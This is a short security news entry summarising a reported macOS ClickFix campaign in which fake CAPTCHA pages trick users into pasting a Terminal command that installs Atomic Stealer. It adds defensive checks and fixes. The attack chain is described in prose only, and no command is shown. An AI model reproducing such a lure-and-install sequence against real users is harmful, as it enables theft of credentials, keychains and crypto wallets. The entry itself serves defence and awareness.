Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: atomic-stealer (1 article)Clear

macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer

Palo Alto's Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or verification page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing it in Finder, finds the app inside, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. The single-command approach is stealthier than older campaigns that relied on the victim manually opening a downloaded image.

Check
Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoints for unexpected hdiutil mounts and curl downloads to the /tmp folder.
Affected
macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
Fix
Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior, and store crypto wallets and secrets in hardware-backed protection.